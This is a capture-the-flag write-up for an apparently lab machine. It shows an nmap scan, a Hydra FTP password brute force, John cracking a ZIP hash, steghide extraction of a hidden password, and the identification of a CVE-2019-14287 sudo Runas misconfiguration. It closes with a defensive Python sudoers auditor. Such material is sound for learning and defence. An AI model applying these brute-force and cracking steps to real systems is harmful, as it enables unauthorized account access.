```
# Nmap 7.91 scan initiated Fri Mar 19 15:05:55 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.48.220
Nmap scan report for 10.10.48.220
Host is up (0.081s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 19 15:09:12 2021 -- 1 IP address (1 host up) scanned in 197.36 seconds
```
We know there is a user named chris, so let's try to brute-force his password over FTP.
```
$ hydra -l chris -P /usr/share/wordlists/passwords/rockyou.txt 10.10.48.220 ftp -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-19 16:56:03
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ftp://10.10.48.220:21/
[21][ftp] host: 10.10.48.220   login: chris   password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-19 16:56:55
```
We can connect to the FTP server and find a file, To_agentJ.txt:
```
Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
```
```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt
Warning: detected hash type "ZIP", but the string is also recognized as "ZIP-opencl"
Use the "--format=ZIP-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alien            (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2021-03-19 17:52) 2.173g/s 53426p/s 53426c/s 53426C/s chatty..280690
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

```
$ 7z x _cutie.png.extracted/8702.zip
```
There is only one file: To_agentR.txt.
```
Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By, Agent R
```
It's a base64 string:
```
$ printf %s 'QXJlYTUx' | base64 -d
Area51
```
It may be a password. For this step I read another write-up, since it's a false-stage guess step: you have to use the password with steghide on the other image.
```
$ steghide info cute-alien.jpg
"cute-alien.jpg":
  format: jpeg
  capacity: 1,8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "message.txt":
    size: 181,0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

$ steghide extract -sf cute-alien.jpg
Enter passphrase:
wrote extracted data to "message.txt"
```
```
$ cat message.txt
Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.
```
```
james@agent-sudo:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
```
This looks like CVE-2019-14287: the rule lets us spawn a shell as any user except root.
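From the defender's side, the weak spot is the sudoers Runas spec itself. The following is an added example, not part of the original write-up: a small sudoers auditor that parses user specifications and flags any Runas list that carves accounts out of `ALL` with `!`, the pattern behind CVE-2019-14287. The sample sudoers text is constructed; only the james line mirrors the entry seen above.

```python
import re

# Constructed sample sudoers content for the audit: the james line mirrors the
# entry shown by "sudo -l" above; the other lines are made up for contrast.
SAMPLE_SUDOERS = """\
# constructed sample, not the target's real /etc/sudoers
Defaults env_reset
james   ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
ops     ALL=(ALL:ALL) ALL
"""

# user  host=(runas_users[:runas_groups]) [tags:] commands
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.*)$")

def parse_rule(line):
    """Parse one user specification carrying a Runas spec; None for other lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    runas_users = m.group("runas").split(":")[0]  # drop the optional group list
    entries = [e.strip() for e in runas_users.split(",") if e.strip()]
    return {
        "user": m.group("user"),
        "host": m.group("host"),
        "allowed": [e for e in entries if not e.startswith("!")],
        "denied": [e.lstrip("!") for e in entries if e.startswith("!")],
        "cmds": m.group("cmds").strip(),
    }

def audit_sudoers(text):
    """Return (line_no, user, message) for rules whose Runas list carves users
    out of ALL with '!'. sudoers(5) says negation is not a reliable restriction,
    and sudo before 1.8.28 lets (ALL, !root) be bypassed (CVE-2019-14287); the
    fix is an explicit runas allowlist on a patched sudo."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith(("#", "Defaults")):
            continue
        rule = parse_rule(line)
        if rule and "ALL" in rule["allowed"] and rule["denied"]:
            findings.append((no, rule["user"],
                             "runas ALL with negated %s: replace with an explicit "
                             "runas user list and make sure sudo is >= 1.8.28"
                             % ", ".join(rule["denied"])))
    return findings

if __name__ == "__main__":
    for no, user, msg in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d (%s): %s" % (no, user, msg))
```

Point it at the output of `visudo -c -f` or at a copy of /etc/sudoers to check a real host; rules without a parenthesised Runas spec are skipped by design.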